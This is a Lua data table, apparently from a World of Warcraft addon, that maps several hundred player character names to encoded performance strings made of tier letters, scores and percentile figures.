["Fakanolaugh"] = "ET:348/90%EB:413/79%EM:745/81%",
["Jimmydives"] = "ET:293/87%EB:662/90%EM:503/90%",
["Æver"] = "ST:766/99%LB:747/98%LM:839/97%",
["Yigu"] = "CT:27/5%UB:242/28%RM:593/67%",
["Undercoversm"] = "ET:282/83%RB:480/69%UM:154/45%",
["Vanillaz"] = "RB:452/73%EM:730/84%",
["Snowpoke"] = "UM:107/39%",
["Deepockets"] = "UB:242/33%UM:315/37%",
["Deadgoat"] = "LT:491/95%EB:421/79%EM:474/80%",
["Imdayman"] = "ET:369/91%EB:368/79%RM:367/74%",
["Bois"] = "CB:25/0%UM:105/31%",
["Malificus"] = "RT:206/61%UB:182/44%RM:470/55%",
["Freezino"] = "CM:39/4%",
["Brainblast"] = "CT:0/2%RB:415/60%UM:341/45%",
["Abellxd"] = "RB:522/71%RM:309/68%",
["Gerald"] = "RB:433/57%EM:692/76%",
["Youwont"] = "CB:59/6%LM:941/96%",
["Madkawaii"] = "RB:478/64%RM:616/67%",
["Faitheus"] = "RT:412/59%EB:554/77%EM:692/79%",
["Predatory"] = "UB:238/31%UM:381/44%",
["Purplenuggie"] = "CB:57/4%RM:202/50%",
["Fosbucks"] = "CT:75/9%RB:511/69%RM:185/51%",
["Zareth"] = "RB:504/68%RM:549/59%",
["Threesixnine"] = "RB:534/71%UM:418/46%",
["Iceicebabÿ"] = "CM:171/16%",
["Seariously"] = "RB:493/73%EM:692/84%",
["Justinjr"] = "ET:633/93%LB:711/95%EM:763/88%",
["Driffa"] = "LB:750/95%EM:785/82%",
["Muckjr"] = "ET:567/76%EB:712/90%RM:594/67%",
["Lijim"] = "CT:28/1%CB:30/3%UM:248/31%",
["Figog"] = "CT:32/2%CB:175/22%UM:239/27%",
["Erpangzi"] = "RT:535/72%RB:527/69%RM:647/72%",
["Thebtg"] = "CB:1/0%CM:34/13%",
["Mallixtus"] = "UT:366/48%RB:262/64%RM:224/61%",
["Trikshot"] = "EB:650/85%RM:528/56%",
["Gnomebody"] = "RT:225/71%EB:597/78%EM:800/83%",
["Alicé"] = "EB:676/87%RM:573/63%",
["Pk"] = "EB:657/83%EM:794/82%",
["Leetz"] = "RT:145/54%EB:744/94%EM:924/94%",
["Tist"] = "EB:739/93%LM:985/98%",
["Velove"] = "CT:37/11%UB:97/26%RM:460/51%",
["Newter"] = "CT:25/0%UB:176/43%CM:194/18%",
["Squirtshot"] = "ET:632/84%LB:759/96%EM:524/85%",
["Neekee"] = "RB:259/58%UM:228/27%",
["Jakobebryant"] = "CT:119/15%RB:488/66%RM:518/58%",
["Justjoshedya"] = "EB:447/86%RM:246/64%",
["Closer"] = "ET:316/85%EB:505/87%RM:573/62%",
["Hydroxy"] = "UT:93/36%EB:459/88%EM:356/77%",
["Yokka"] = "ET:649/85%EB:686/88%RM:656/70%",
["Kwill"] = "CM:26/0%",
["Papadecuatro"] = "UT:368/48%RB:348/50%RM:523/65%",
["Jimmybigtime"] = "RB:516/69%EM:739/77%",
["Vroosta"] = "RT:561/73%EB:684/87%EM:759/80%",
["Jeanthebean"] = "ET:573/77%EB:697/89%EM:856/89%",
["Evisce"] = "UT:348/45%EB:678/87%EM:810/85%",
["Bloomkin"] = "ET:684/93%LB:599/97%EM:675/86%",
["Foxalf"] = "UB:320/41%CM:36/3%",
["Jibzmage"] = "RB:443/64%EM:813/86%",
["Qassy"] = "ET:593/85%UB:257/49%EM:644/81%",
["Ramathore"] = "LB:766/98%LM:917/95%",
["Färm"] = "RT:458/61%EB:665/90%EM:777/83%",
["Yrage"] = "EB:737/92%EM:860/89%",
["Lothor"] = "CB:57/3%",
["Dadgamer"] = "CB:171/19%RM:514/56%",
["Pandamania"] = "LB:777/98%EM:801/85%",
["Bluhcuh"] = "RB:405/54%",
["Dominatus"] = "UB:343/47%RM:439/52%",
["Decontrol"] = "RB:415/56%EM:825/87%",
["Ampp"] = "LB:763/96%EM:923/94%",
["Tholin"] = "LB:793/98%LM:964/97%",
["Klingonn"] = "EB:734/94%EM:793/89%",
["Clamentine"] = "LB:735/95%EM:817/87%",
["Frolin"] = "EB:721/91%EM:761/80%",
["Opalsa"] = "EM:816/81%",
["Sampson"] = "CB:13/0%UM:314/36%",
["Invisapooii"] = "UT:262/34%EB:680/87%RM:556/62%",
["Juggrnaut"] = "CT:145/15%EB:582/80%EM:801/86%",
["Bootymop"] = "LB:771/98%",
["Trine"] = "LB:728/95%EM:840/89%",
["Paulmarktcop"] = "CB:35/4%RM:664/71%",
["Niby"] = "EB:699/89%EM:741/77%",
["Océlot"] = "LT:526/97%EB:733/93%LM:879/95%",
["Bobdigi"] = "CT:115/14%RB:552/74%EM:852/89%",
["Alletaria"] = "RB:424/58%EM:701/76%",
["Sniperwizard"] = "CT:81/10%LB:760/95%EM:830/87%",
["Hidenfleek"] = "UM:181/45%",
["Izold"] = "CT:0/2%UB:256/29%UM:363/37%",
["Tbags"] = "CT:53/17%RB:372/50%RM:191/51%",
["Durumi"] = "RB:526/71%EM:738/78%",
["Shabooty"] = "UB:262/34%UM:385/44%",
["Kittara"] = "CT:75/9%CB:155/19%CM:66/24%",
["Windraven"] = "CM:132/11%",
["Zuqar"] = "UT:211/41%UB:244/47%UM:257/46%",
["Ríco"] = "CB:83/8%CM:16/2%",
["Puckbunny"] = "RT:159/55%EB:588/77%EM:724/77%",
["Dattster"] = "RT:210/70%EB:698/92%EM:669/77%",
["Karesh"] = "UT:86/35%RB:391/50%RM:625/67%",
["Odobenus"] = "RT:492/64%EB:553/79%EM:734/77%",
["Whillwin"] = "EB:385/77%UM:91/47%",
["Drakeramoray"] = "RB:288/65%RM:597/66%",
["Foopa"] = "UB:289/39%UM:121/42%",
["Calfeinated"] = "UM:70/29%",
["Deepdekedmg"] = "CT:0/1%UB:296/40%UM:66/25%",
["Capinsano"] = "RB:314/68%UM:472/49%",
["Iambookz"] = "EB:615/80%EM:788/82%",
["Triscuithead"] = "UT:241/34%EB:647/92%EM:618/82%",
["Spiritone"] = "UT:105/41%EB:554/75%RM:658/70%",
["Heste"] = "RT:496/66%EB:657/84%RM:627/65%",
["Gîmlî"] = "CB:114/12%UM:484/44%",
["Remyz"] = "LB:740/96%EM:544/89%",
["Stayhomehub"] = "ET:661/91%LB:738/97%LM:933/98%",
["Tyrsson"] = "RT:435/59%EB:575/75%RM:570/64%",
["Iamdrunk"] = "RT:153/56%EB:504/91%EM:900/93%",
["Yangleduo"] = "RT:526/70%EB:454/83%RM:684/73%",
["Yihaofa"] = "ET:642/84%EB:662/89%RM:573/67%",
["Encryptian"] = "RT:241/69%EB:549/94%SM:983/99%",
["Meinan"] = "ET:716/92%EB:667/86%EM:888/93%",
["Yuleri"] = "UT:98/36%EB:404/78%EM:819/81%",
["Shadwen"] = "RT:167/58%EB:537/90%EM:806/83%",
["Breakfastman"] = "UT:126/43%UB:179/41%RM:298/56%",
["Vrls"] = "UB:287/38%RM:551/61%",
["Swiftthistle"] = "CT:19/2%RM:497/67%",
["Trickstars"] = "RT:136/51%RB:251/60%EM:743/80%",
["Commas"] = "EB:709/91%LM:923/95%",
["Oolddriver"] = "ET:722/93%LB:759/96%EM:856/90%",
["Yaomomo"] = "RT:380/51%EB:419/81%RM:636/69%",
["Sourcheese"] = "UB:265/34%CM:34/2%",
["Telara"] = "CB:164/21%RM:542/60%",
["Ihatewow"] = "RB:278/67%EM:652/75%",
["Thebearbq"] = "ET:598/85%EB:565/87%EM:723/89%",
["Jkx"] = "ET:364/91%UB:245/33%EM:362/77%",
["Dooly"] = "RB:298/70%RM:537/63%",
["Gaygodx"] = "CM:36/10%",
["Zombieritual"] = "EB:675/86%EM:843/89%",
["Crawn"] = "UM:115/37%",
["Foopas"] = "UB:222/29%UM:412/46%",
["Coomie"] = "RB:326/68%EM:659/91%",
["Goibon"] = "CB:117/13%",
["Chlean"] = "RT:513/68%EB:692/88%EM:705/76%",
["Inata"] = "ST:638/99%LB:664/98%SM:960/99%",
["Awpmap"] = "RT:496/67%EB:739/93%EM:842/87%",
["Omnipotence"] = "RB:490/64%EM:522/83%",
["Sanbaofan"] = "RT:502/66%EB:674/86%RM:471/53%",
["Progamers"] = "UT:124/45%EB:720/91%EM:756/80%",
["Lilfrostbolt"] = "UT:337/43%UB:347/45%RM:459/50%",
["Mikah"] = "RB:535/71%EM:819/86%",
["Paulyc"] = "RB:478/64%EM:444/75%",
["Firanak"] = "EM:418/77%",
["Indexsan"] = "RB:424/57%EM:806/85%",
["Milkaholic"] = "CB:49/11%RM:223/61%",
["Unbearable"] = "EB:577/88%EM:672/86%",
["Kvothras"] = "ET:601/79%EB:587/77%RM:672/72%",
["Paytwobag"] = "RT:220/69%RB:333/69%UM:363/37%",
["Shmogger"] = "CB:84/8%UM:281/32%",
["Dochann"] = "UB:342/46%EM:518/88%",
["Magevurtne"] = "LT:603/98%EB:481/89%RM:549/64%",
["Chargerelese"] = "ET:336/90%EB:633/87%EM:677/85%",
["Barinda"] = "CB:63/14%UM:77/25%",
["Tëla"] = "RB:374/50%RM:575/62%",
["Mixyu"] = "EB:501/87%RM:675/73%",
["Javathebest"] = "RT:459/61%RB:229/58%EM:646/75%",
["Icemagez"] = "CB:43/5%UM:92/35%",
["Sonja"] = "RB:521/71%RM:542/60%",
["Vulcon"] = "UM:414/43%",
["Phillthy"] = "EB:511/88%EM:717/77%",
["Dottyshrimp"] = "EB:692/88%EM:587/87%",
["Brotdose"] = "LB:750/97%EM:869/94%",
["Ginyu"] = "UB:255/33%UM:352/37%",
["Xiaoshenyi"] = "CB:153/17%RM:231/54%",
["Imhao"] = "CT:84/10%RB:412/57%EM:360/77%",
["Alexandriena"] = "UB:124/34%UM:320/38%",
["Dushou"] = "CT:42/5%EB:397/77%RM:632/69%",
["Robotvacuum"] = "CB:106/14%RM:488/53%",
["Mikoi"] = "CT:59/21%UB:183/45%RM:521/55%",
["Karín"] = "CT:5/7%RM:222/53%",
["Deaders"] = "EB:607/84%EM:777/85%",
["Ebeewa"] = "CT:152/17%RM:615/72%",
["Kimpy"] = "EB:741/94%LM:966/97%",
["Deathstroke"] = "ET:239/76%EB:611/85%EM:447/81%",
["Jaxo"] = "UM:421/43%",
["Nallely"] = "CB:179/23%RM:247/64%",
["Alleniverson"] = "UB:238/31%UM:258/36%",
["Notevenklose"] = "UT:205/26%UB:100/27%RM:230/56%",
["Crunktopus"] = "RT:85/56%RB:315/58%EM:717/83%",
["Sumdumrogue"] = "CT:72/9%UB:246/31%UM:249/30%",
["Ilacey"] = "UT:368/47%EB:613/80%EM:515/81%",
["Hugepeen"] = "RB:376/51%RM:660/72%",
["Killrogue"] = "RB:555/71%RM:683/72%",
["Vendeezmo"] = "UM:417/49%",
["Getpumped"] = "RM:539/60%",
["Navi"] = "RM:180/54%",
["Imzadi"] = "UT:130/28%RB:367/62%EM:531/78%",
["Magicalseto"] = "RB:405/58%RM:598/72%",
["Nerium"] = "CB:138/16%UM:248/29%",
["Kurathionis"] = "LB:753/95%EM:885/90%",
["Aeriolla"] = "RB:537/71%EM:884/92%",
["Yougotgnomed"] = "RT:509/68%EB:641/87%EM:830/88%",
["Screnzilton"] = "RT:510/68%EB:707/93%EM:838/91%",
["Darklordr"] = "RM:534/63%",
["Probablylos"] = "UB:334/41%UM:317/36%",
["Jilvalentine"] = "EB:687/87%EM:818/87%",
["Dizangy"] = "EB:617/81%EM:809/85%",
["Oxygen"] = "EB:570/79%EM:799/89%",
["Ferrimstab"] = "RB:473/63%RM:394/71%",
["Coska"] = "UM:307/35%",
["Aleksander"] = "EB:585/77%RM:461/52%",
["Cleopatravii"] = "RT:453/70%EB:497/76%RM:278/58%",
["Gorillawar"] = "EB:439/82%EM:809/84%",
["Johnward"] = "UB:45/35%RM:589/69%",
["Erridani"] = "RB:422/60%RM:515/61%",
["Ganish"] = "RT:514/70%EB:636/83%EM:763/81%",
["Anygankers"] = "EB:691/88%EM:809/85%",
["Hutuza"] = "UB:337/48%RM:534/66%",
["Gndlfthsmall"] = "RB:367/53%RM:536/66%",
["Fearum"] = "RB:216/51%RM:544/59%",
["Exoblast"] = "UB:221/29%UM:351/41%",
["Tahir"] = "CT:150/19%RB:209/52%RM:637/74%",
["Spumdungus"] = "EB:565/75%RM:581/63%",
["Goozoo"] = "RT:184/62%EB:708/90%EM:837/87%",
["Miava"] = "UT:109/49%RB:547/73%EM:730/79%",
["Ashirlem"] = "CB:42/4%UM:250/34%",
["Pairs"] = "RB:531/70%RM:643/68%",
["Drizzyy"] = "UT:358/46%RB:413/57%RM:168/52%",
["Executee"] = "CT:89/16%EB:688/87%EM:806/91%",
["Chicabonita"] = "EM:729/83%",
["Âces"] = "UT:118/42%RB:427/57%RM:543/59%",
["Bigtruss"] = "EB:666/85%EM:823/87%",
["Trixforkids"] = "EB:640/83%RM:692/74%",
["Toboggan"] = "UM:383/44%",
["Zoody"] = "EB:603/83%RM:578/67%",
["Zargg"] = "CB:73/6%EM:763/83%",
["Jumpbear"] = "EB:627/88%RM:437/52%",
["Tarobread"] = "RM:685/73%",
["Dillards"] = "EM:682/77%",
["Frootloops"] = "EB:574/77%EM:695/75%",
["Savox"] = "CB:5/0%UM:193/47%",
["Prophet"] = "RT:485/66%EB:557/75%RM:287/65%",
["Dutazing"] = "UT:114/44%EB:375/76%EM:485/82%",
["Dhhunter"] = "RT:505/69%EB:737/93%RM:610/67%",
["Searus"] = "UT:79/28%SB:800/99%LM:961/97%",
["Hevalin"] = "RM:583/62%",
["Sukmohow"] = "CB:33/2%UM:149/39%",
["Boombaya"] = "ET:317/87%EB:654/84%EM:692/92%",
["Badrecoil"] = "CB:80/9%RM:225/57%",
["Ymeimei"] = "CM:140/19%",
["Flameblast"] = "CT:8/8%UM:111/40%",
["Geenisweenis"] = "CB:76/6%RM:442/52%",
["Strínger"] = "ET:714/87%EB:647/88%RM:644/74%",
["Xhaco"] = "ET:278/81%EB:525/89%EM:890/92%",
["Jrannie"] = "ET:281/83%CB:59/6%EM:728/78%",
["Windfuryprox"] = "UT:83/26%UB:270/36%RM:559/65%",
["Schinitzel"] = "RT:143/53%RB:322/68%UM:185/49%",
["Hotzone"] = "CT:139/15%CB:170/19%RM:517/61%",
["Debrimundiya"] = "CB:2/0%CM:37/12%",
["Mashinky"] = "CB:74/7%UM:340/40%",
["Farmms"] = "RM:199/57%",
["Scraggs"] = "CB:174/23%RM:578/64%",
["Maribelle"] = "ET:687/88%EB:692/88%EM:731/78%",
["Hgkk"] = "CB:173/22%UM:382/43%",
["Sublux"] = "EM:705/81%",
["Snowzi"] = "ET:732/90%EB:616/87%EM:770/87%",
["Bigmaniac"] = "UB:127/30%RM:437/52%",
["Bearmace"] = "EB:571/77%RM:611/67%",
["Anmis"] = "UM:355/42%",
["Entruv"] = "EM:697/76%",
["Painmasterx"] = "CB:151/16%RM:555/64%",
["Magejuana"] = "CM:3/1%",
["Mekaj"] = "EB:709/90%EM:872/91%",
["Shanrix"] = "EB:635/87%RM:542/64%",
["Lochmodan"] = "RT:382/50%EB:620/81%EM:750/80%",
["Kayvann"] = "RB:547/72%RM:655/73%",
["Veeb"] = "CT:171/22%UB:311/41%EM:738/78%",
["Hexagramxx"] = "ET:709/91%EB:734/93%EM:894/93%",
["Alzuros"] = "EB:664/85%EM:890/91%",
["Stingraystev"] = "EM:829/91%",
["Danaharry"] = "ET:674/88%EB:748/94%LM:938/96%",
["Sevyrus"] = "RM:449/53%",
["Norfuski"] = "UT:182/28%EB:573/80%RM:555/65%",
["Qyui"] = "UT:319/44%EB:385/76%EM:716/78%",
["Onefiftyx"] = "CM:199/19%",
["Snilloc"] = "CM:118/16%",
["Zibz"] = "LT:755/96%EB:579/92%EM:896/93%",
["Chuuch"] = "EB:704/92%LM:887/95%",
["Kwiyomi"] = "ET:703/87%EB:638/88%CM:183/22%",
["Guruofhentai"] = "RM:495/55%",
["Diremaraudon"] = "EB:648/83%EM:834/86%",
["Adya"] = "ET:623/81%EB:641/83%EM:787/83%",
["Comicrogue"] = "UM:291/34%",
["Humorbeing"] = "CT:66/10%RB:200/50%EM:505/76%",
["Phantasywlk"] = "ET:320/85%RB:357/72%EM:699/75%",
["Peepixie"] = "RT:358/54%EB:549/86%LM:892/97%",
["Magicbush"] = "RT:553/73%EB:563/91%EM:817/86%",
["Gbuturbo"] = "ET:561/76%EB:676/86%LM:917/95%",
["Romanticduke"] = "RM:647/70%",
["Bossboy"] = "CM:98/14%",
["Silverfoxgwg"] = "CT:35/3%RM:586/64%",
["Tealock"] = "CM:86/11%",
["Loktara"] = "RM:227/58%",
["Ihateumeshu"] = "UT:269/39%RB:562/74%EM:871/91%",
["Vancleefs"] = "UT:152/33%RB:343/60%RM:206/50%",
["Zaida"] = "RB:295/65%RM:297/65%",
["Accomplished"] = "CB:91/12%RM:523/57%",
["Suwuavo"] = "ET:237/76%RB:520/71%",
["Ellonkah"] = "RT:137/51%CB:105/11%CM:27/0%",
["Stonepriest"] = "CM:16/22%",
["Aoeverything"] = "CB:72/19%CM:102/16%",
["Vrex"] = "ET:244/78%EB:508/89%EM:547/86%",
["Bigbubba"] = "UB:100/27%RM:561/58%",
["Pediawiki"] = "LT:611/98%LB:720/98%EM:697/92%",
["Naero"] = "LT:460/95%RB:288/63%RM:359/68%",
["Dampendflame"] = "RB:295/69%UM:155/44%",
["Birdwasher"] = "CT:0/4%RB:195/52%EM:384/80%",
["Kriggz"] = "RB:265/61%RM:227/58%",
["Franklyn"] = "UB:353/47%RM:497/55%",
["Brixas"] = "CB:4/0%RM:213/59%",
["Swobuu"] = "RB:353/73%RM:550/63%",
["Ooffoo"] = "CT:33/7%RB:306/67%RM:223/55%",
["Whitedoug"] = "UB:115/28%EM:480/78%",
["Decaytur"] = "RB:427/56%EM:420/82%",
["Grampart"] = "CT:12/7%UB:200/47%RM:168/64%",
["Tuggle"] = "UT:260/33%CB:80/10%CM:48/6%",
["Víle"] = "EB:561/79%EM:733/83%",
["Holyeffinwtf"] = "EB:700/89%EM:786/82%",
["Muchogusto"] = "UT:278/39%EB:620/80%EM:709/75%",
["Ryuzakikun"] = "CB:79/10%EM:335/75%",
["Mined"] = "CM:129/16%",
["Atomysk"] = "RT:234/71%RB:111/53%RM:408/65%",
["Guldizzle"] = "UM:334/34%",
["Winstun"] = "CB:156/18%RM:484/57%",
["Tony"] = "LM:963/98%",
["Vaylen"] = "EM:710/76%",
["Eleshock"] = "ET:467/94%EB:470/87%EM:839/92%",
["Orum"] = "CT:138/17%CB:72/8%CM:150/18%",
["Hugetotem"] = "UB:119/30%RM:371/62%",
["Smuggz"] = "EB:633/82%RM:693/74%",
["Freatize"] = "EB:691/89%LM:936/97%",
["Sf"] = "RB:382/53%EM:708/76%",
["Simpous"] = "UM:343/41%",
["Sheepsheep"] = "UT:78/30%RB:405/56%RM:549/64%",
["Ilurk"] = "LB:774/97%LM:956/97%",
["Setsem"] = "LB:758/95%SM:1006/99%",
["Yoofa"] = "EB:407/83%UM:244/28%",
["Kigar"] = "UT:64/26%UB:115/28%RM:246/58%",
["Matoma"] = "RT:489/74%EB:485/90%EM:725/87%",
["Sugaafree"] = "CB:33/8%RM:278/58%",
["Actionlock"] = "RB:445/60%RM:458/50%",
["Ukimas"] = "EB:649/84%EM:832/87%",
["Gotrekx"] = "RT:427/58%RB:512/70%EM:764/81%",
["Eimo"] = "UM:407/45%",
["Pirosha"] = "RB:536/71%RM:619/68%",
["Marpole"] = "ET:703/91%EB:746/93%EM:898/92%",
["Ligmaa"] = "UT:365/48%EB:680/87%EM:818/87%",
["Paipan"] = "EB:647/89%EM:682/78%",
["Alawy"] = "RB:434/60%EM:673/77%",
["Hawah"] = "ET:702/90%EB:710/90%LM:942/96%",
["Beibeil"] = "ET:728/93%EB:352/76%RM:390/50%",
["Ubbi"] = "ET:617/82%EB:750/94%LM:939/96%",
["Aladin"] = "CM:45/16%",
["Dalnim"] = "EB:701/90%EM:896/93%",
["Incelsior"] = "RB:377/51%RM:619/67%",
["Palwarf"] = "RB:526/71%RM:614/67%",
["Dojukku"] = "UT:377/49%RB:526/70%RM:675/73%",
["Noomo"] = "CM:198/24%",
["Cesarjj"] = "UM:130/36%",
["Twilightt"] = "EB:683/91%EM:772/88%",
["Hotbaaji"] = "EB:651/84%EM:775/83%",
["Kilrone"] = "ET:398/78%EB:534/80%RM:473/65%",
["Spinakur"] = "LT:784/98%LB:746/95%LM:822/98%",
["Shifthappenz"] = "ET:661/91%EB:639/90%EM:619/82%",
["Canttuchthis"] = "RB:441/55%EM:654/82%",
["Banzaii"] = "CT:42/9%RB:446/55%EM:472/80%",
["Kelp"] = "UT:188/28%EB:640/81%EM:521/83%",
["Ironnhyde"] = "RT:150/55%UB:382/48%EM:535/84%",
["Forgespirit"] = "UT:124/44%RB:414/56%EM:408/75%",
["Chokotako"] = "RT:537/71%EB:673/86%EM:859/89%",
["Kkayy"] = "LT:586/97%EB:704/89%RM:656/71%",
["Sawced"] = "UT:268/38%EB:502/87%EM:646/90%",
["Giroffme"] = "ET:731/93%EB:719/93%EM:838/92%",
["Sekimlong"] = "UT:91/36%UB:331/44%RM:347/71%",
["Orphine"] = "UT:344/44%EB:609/77%EM:826/86%",
["Alouqua"] = "RT:401/54%EB:570/76%EM:667/91%",
["Rizei"] = "UB:45/32%UM:113/41%",
["Chinak"] = "CT:41/13%CB:88/10%UM:338/38%",
["Tizituraxx"] = "RT:218/72%RB:341/71%RM:287/65%",
["Murderd"] = "EB:398/78%RM:245/59%",
["Vicholoch"] = "LT:449/95%EB:500/91%EM:648/77%",
["Haadoken"] = "UM:414/42%",
["Zeroyou"] = "UB:151/36%UM:93/31%",
["Laceysham"] = "UT:85/26%RB:325/73%UM:133/41%",
["Olliman"] = "CT:187/24%CB:133/16%UM:114/33%",
["Dunderbolt"] = "UM:358/42%",
["Grublet"] = "UT:74/28%UB:176/47%RM:172/52%",
["Lithyn"] = "UM:142/47%",
["Catastropher"] = "RB:432/60%RM:279/68%",
["Dylanoo"] = "CT:0/4%RB:436/72%EM:387/76%",
["Lomiplo"] = "CT:47/15%UM:111/36%",
["Dethora"] = "EM:721/82%",
["Krek"] = "ET:618/87%EB:658/89%EM:513/91%",
["Lalamancer"] = "UB:296/40%UM:371/44%",
["Cloudyskies"] = "EB:419/85%EM:646/75%",
["Dmystik"] = "CT:13/8%UB:192/25%EM:359/77%",
["Sugmadicz"] = "RM:240/54%",
["Allyeater"] = "UM:115/33%",
["Sixlet"] = "RM:581/68%",
["Slimthick"] = "EB:732/93%EM:810/85%",
["Qwazy"] = "CM:30/2%",
["Bubblelol"] = "RM:489/56%",
["Oomrom"] = "CT:143/16%CB:79/7%UM:313/36%",
["Craftysavage"] = "RT:131/50%CB:132/16%CM:138/17%",
["Empii"] = "ET:638/83%EB:428/80%RM:539/58%",
["Domnater"] = "UT:75/30%RB:525/67%UM:137/40%",
["Lucinthale"] = "CT:114/14%UB:336/48%UM:249/35%",
["Nerb"] = "RT:509/69%EB:566/76%RM:759/74%",
["Sullfate"] = "CB:60/11%UM:92/27%",
["Mittreeleaf"] = "CT:69/10%CM:41/19%",
["Gatherer"] = "EB:720/91%EM:857/88%",
["Vessar"] = "RB:456/60%RM:669/71%",
["Indicasativa"] = "UM:427/49%",
["Igniter"] = "CB:114/15%RM:583/71%",
["Slickster"] = "RB:309/66%EM:480/81%",
["Serevok"] = "UB:129/29%RM:538/72%",
["Karnix"] = "RM:677/73%",
["Wardros"] = "RM:491/52%",
["Felicka"] = "ET:632/83%LB:662/96%LM:938/96%",
["Mmech"] = "EB:605/79%EM:885/92%",
["Nottmage"] = "CM:104/9%",
["Hybridtrash"] = "UB:59/26%EM:647/86%",
["Ælysia"] = "ET:598/79%LB:739/95%LM:761/96%",
["Blatsz"] = "RT:550/73%EB:617/81%LM:960/96%",
["Brunard"] = "RT:354/53%UB:229/31%RM:280/69%",
["Sorosion"] = "ET:734/94%LB:755/95%LM:824/96%",
["Hardwolker"] = "RT:520/71%RB:546/74%RM:186/51%",
["Lieza"] = "ET:602/86%EB:669/90%EM:741/88%",
["Cappt"] = "RT:537/72%RB:495/71%EM:423/79%",
["Ténèbres"] = "UB:235/30%RM:349/67%",
["Punchdruñk"] = "UT:108/38%UB:251/32%RM:294/65%",
["Monkeydgarph"] = "CT:88/16%CB:90/22%UM:89/30%",
["Liggyma"] = "LT:768/97%EB:704/90%EM:879/91%",
["Pnw"] = "RT:465/63%RB:525/74%EM:731/83%",
["Diablot"] = "ET:688/92%LB:745/96%EM:826/92%",
["Schlimbo"] = "ET:614/87%EB:595/85%EM:745/88%",
["Sheepzu"] = "UT:344/45%EB:609/84%EM:819/90%",
["Kithanan"] = "CT:108/13%UB:337/49%RM:557/61%",
["Lolabunnyy"] = "CB:33/5%UM:202/26%",
["Willynilly"] = "UT:307/40%EB:654/85%EM:720/93%",
["Incentive"] = "UT:310/40%CB:94/12%UM:140/42%",
["Cyll"] = "ET:560/76%EB:737/93%EM:895/93%",
["Fridgelogic"] = "RM:439/51%",
["Naz"] = "RT:431/59%EB:703/90%EM:827/87%",
["Kenjamin"] = "RT:508/68%RB:496/71%EM:729/83%",
["Chabina"] = "CM:30/1%",
["Mattcha"] = "RB:530/72%UM:434/48%",
["Iggzxo"] = "RT:447/60%LB:765/96%EM:877/91%",
["Awizardharry"] = "EM:514/88%",
["Skizbit"] = "CB:38/2%RM:171/52%",
["Nizori"] = "EM:798/86%",
["Grymmlure"] = "RM:489/55%",
["Ganick"] = "ET:408/93%UB:225/27%UM:129/35%",
["Quinzh"] = "CB:63/15%UM:266/32%",
["Snakeables"] = "EM:650/75%",
["Pekayy"] = "ET:574/76%EB:601/83%RM:617/72%",
["Boglo"] = "UB:146/38%UM:391/44%",
["Dztoo"] = "RT:404/53%RB:533/71%RM:522/57%",
["Daggereralus"] = "UT:272/35%RB:328/69%UM:106/31%",
["Younggoo"] = "ET:588/79%EB:609/79%RM:380/73%",
["Arcutus"] = "RT:502/67%EB:623/81%RM:360/71%",
["Rext"] = "LT:579/98%EB:695/91%EM:863/93%",
["Kirky"] = "UT:77/31%UB:222/25%UM:111/35%",
["Somebodyelse"] = "RB:388/55%EM:401/75%",
["Secondwave"] = "RM:216/56%",
["Nakednut"] = "RT:214/72%EB:601/78%EM:766/82%",
["Tankson"] = "ET:419/94%EB:722/94%LM:889/95%",
["Androx"] = "ET:235/76%EB:644/81%EM:755/79%",
["Mishmosh"] = "CB:158/19%UM:141/46%",
["Skante"] = "CT:42/4%UB:329/44%UM:92/32%",
["Quackinator"] = "UM:154/49%",
["Mishka"] = "ET:422/94%EB:689/92%EM:784/87%",
["Dravenx"] = "UT:280/36%UB:336/44%UM:168/43%",
["Dannasan"] = "RM:211/59%",
["Yungdumble"] = "RM:433/51%",
["Wozyrd"] = "CT:44/8%EB:662/86%EM:853/89%",
["Gilfred"] = "UM:328/39%",
["Distefano"] = "CT:98/9%RB:419/59%RM:547/63%",
["Bratatouille"] = "CT:35/9%UB:237/30%UM:324/38%",
["Friskykiller"] = "CM:70/6%",
["Belmontegodx"] = "CM:47/17%",
["Sporkus"] = "EB:602/80%RM:664/72%",
["Doomer"] = "RB:505/67%EM:820/87%",
["Bogdanoff"] = "UT:71/27%EB:692/89%EM:809/84%",
["Hoepatrol"] = "EB:647/83%EM:813/84%",
["Feelz"] = "CB:140/15%CM:102/11%",
["Mobilize"] = "EB:621/86%EM:842/93%",
["Emuhly"] = "EB:716/91%EM:809/86%",
["Ahool"] = "RT:519/74%EB:672/90%LM:899/95%",
["Hottdogwater"] = "UM:355/42%",
["Plumwine"] = "CB:184/23%UM:355/37%",
["Cometodaddy"] = "RB:438/60%RM:529/59%",
["Advils"] = "RM:279/58%",
["Kokoda"] = "RT:411/56%EB:419/81%RM:673/73%",
["Turnitoff"] = "RT:184/61%RB:211/53%CM:4/2%",
["Biubiuxx"] = "EB:525/89%EM:752/79%",
["Rascalzs"] = "ET:284/84%EB:726/92%EM:737/80%",
["Jáñüàrÿ"] = "ET:582/84%EB:552/94%EM:638/84%",
["Csk"] = "UB:172/43%CM:175/21%",
["Phoenixfury"] = "ET:340/89%EB:545/94%EM:735/83%",
["Anywhere"] = "RT:508/72%EB:546/94%EM:835/91%",
["Furyband"] = "ET:649/89%LB:770/98%EM:768/83%",
["Wuguzaliang"] = "CT:85/19%EB:514/92%EM:604/78%",
["Candyxiao"] = "CM:126/18%",
["Kyrosan"] = "RB:311/66%RM:546/59%",
["Maybeahealer"] = "CT:37/15%EB:327/76%RM:356/65%",
["Caymangt"] = "CT:85/15%CB:185/20%RM:478/54%",
["Sayui"] = "CM:42/3%",
["Stonebrewing"] = "EB:701/90%EM:717/77%",
["Koushirou"] = "LT:653/98%LB:716/98%LM:900/96%",
["Desir"] = "EB:524/80%EM:610/79%",
["Axxman"] = "ET:740/94%LB:755/95%LM:963/98%",
["Herculean"] = "CM:26/0%",
["Crazysoul"] = "CM:111/16%",
["Zakinchi"] = "EB:633/83%RM:670/73%",
["Redlez"] = "RM:223/61%",
["Undeadtits"] = "CT:134/15%CB:28/1%UM:253/30%",
["Gatorßait"] = "RT:75/52%RM:460/69%",
["Arbotration"] = "RT:171/61%RB:474/63%RM:579/62%",
["Azilrom"] = "CM:178/22%",
["Emihoro"] = "CB:81/9%RM:570/63%",
["Lexer"] = "RM:506/58%",
["Gonnabslayd"] = "UM:52/32%",
["Fattyheals"] = "CM:38/2%",
["Sekiro"] = "CM:26/0%",
["Judd"] = "CM:28/1%",
["Aimedshott"] = "CT:47/16%UB:355/48%RM:338/71%",
["Swisegood"] = "UM:335/39%",
["Kaguchan"] = "ET:688/92%EB:635/82%EM:567/80%",
["Sicarri"] = "LT:472/95%EB:736/93%EM:882/91%",
["Embrr"] = "CM:101/14%",
